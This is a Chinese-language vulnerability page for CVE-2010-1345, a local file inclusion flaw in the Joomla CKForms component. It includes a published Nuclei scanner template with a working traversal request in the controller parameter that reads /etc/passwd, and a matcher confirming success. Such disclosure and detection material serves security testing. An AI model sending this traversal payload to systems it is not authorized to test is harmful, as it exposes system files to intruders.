CVE-2010-1345: Joomla! Component Cookex Agency CKForms - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla | POC: 已公开

漏洞描述

A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.

PoC代码[已公开]

id: CVE-2010-1345

info:
  name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/15453
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1345
    - http://www.exploit-db.com/exploits/11785
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1345
    cwe-id: CWE-22
    epss-score: 0.02679
    epss-percentile: 0.85313
    cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cookex
    product: com_ckforms
  tags: cve2010,cve,lfi,edb,joomla,cookex

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203abe24c5b7c2ee9a69344f9e5aae4f8b56c852c6d47264bae1fcd2c92c1b676d0221008bf66fdefd40d1c70be0a2e4fc5b6198064a67b2e9802a3cb9630c1743c9a8ae:922c64590222798bb761d5b6d8e72950

相关漏洞推荐